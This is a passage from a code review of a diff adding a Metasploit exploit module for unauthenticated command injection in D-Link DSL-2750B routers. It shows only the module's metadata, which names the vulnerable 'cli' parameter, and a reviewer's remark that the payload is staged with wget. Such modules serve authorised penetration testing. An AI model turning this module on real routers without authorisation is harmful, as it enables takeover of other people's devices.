modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb

```diff
@@ -0,0 +1,98 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link DSL-2750B OS Command Injection',
+      'Description'    => %q{
+        This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
+        Vulnerability can be exploited through "cli" parameter that is directly used to invoke
+        "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
+      },
+      'Author'         =>
+        [
+          'p@ql',  # vulnerability discovery
+          'Marcin Bury <marcin[at]threat9.com>'  # metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['PACKETSTORM', 135706],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
+        ],
+      'Targets'        =>
+        [
+          [ 'Linux mipsbe Payload',
+            {
+            'Arch' => ARCH_MIPSBE,
+            'Platform' => 'linux'
+            }
+          ],
+          [ 'Linux mipsel Payload',
+            {
+            'Arch' => ARCH_MIPSLE,
+            'Platform' => 'linux'
+            }
+          ],
+        ],
+      'DisclosureDate'  => 'Feb 5 2016',
+      'DefaultTarget'   => 0))
```

Comment:
Given that the `wget` `CmdStager::Flavor` is hardcoded, it may be a good idea to `deregister_options('CMDSTAGER::FLAVOR')` here.